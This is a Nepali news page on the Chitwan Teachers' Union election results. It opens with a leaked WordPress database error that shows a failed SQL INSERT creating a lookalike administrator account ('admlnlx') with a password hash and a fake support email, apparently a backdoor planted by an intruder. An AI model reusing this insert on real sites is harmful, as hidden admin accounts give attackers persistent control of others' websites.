WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsFaZIp91.Czuv22pro0r8Jq.541NO.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 05:06:51', '', 'admlnlx', 'admlnlx')
चितवन, फागुन २–
नेपाल शिक्षक संघ चितवनको अध्यक्षमा डा.हरिप्रसाद कँडेल निर्वाचित हुनुभएको छ । निकटम प्रतिस्पर्धी ध्रुव पोखरेललाई ९३ मतले पछि पार्दै कँडेल अध्यक्षमा निर्वाचित हुनु भएको हो । कँडेलले ७ सय ९२ मत प्राप्त गर्नुभयो भने पोखरेलले ६ सय ९९ मत प्राप्त गर्नुभयो ।
यस्तै महिला उपाध्यक्षमा इन्दिरा महरठ्ठा (८८४), खुल्ला उपाध्यक्षमा शेषकान्त रेग्मी (९७५), सचिवमा प्रेमराज पौडेल (८७२), सचिव अर्थमा शिवराज अधिकारी (९८९), सचिव अर्थ महिलामा टिका खत्री निर्विरोध निर्वाचित हुनुभयो ।
यसैगरि सह–सचिव समावेशी तर्फ कमल गुरुङ (८६९), खड्कबहादुर विश्वकर्मा (९०७) निर्वाचित हुनुभयो भने खुल्ला सह–सचिव तर्फ सरोजकुमार अधिकारी (७६१) निर्वाचित हुभयो ।
त्यसैगरि प्रदेश प्रतिनिधि खुल्ला तर्फ उदयबहादुर थिङ, तोयानाथ दाहाल, बालकृष्ण ढकाल, यानबहादुर गुरुङ, रामकृष्ण श्रेष्ठ, विनोदकुमार अधिकारी र सुरेन्द्र पौडेल निर्वाचित हुनुभयो ।
यसैगरि प्रदेश प्रतिनिधिमा महिला तर्फ इन्द्रमाया लामा, विद्या कोइराला, सुमित्रा गोम्जा निर्विरोध निर्वाचित हुनुभयो ।
त्यसैगरि संघीय महाधिवेशन प्रतिनिध महिला तर्फ गीताकुमारी गुरुङ, प्रमिला ढकाल र मैयाँदेवी अम्गाई निर्वाचित हुनुभएको छ ।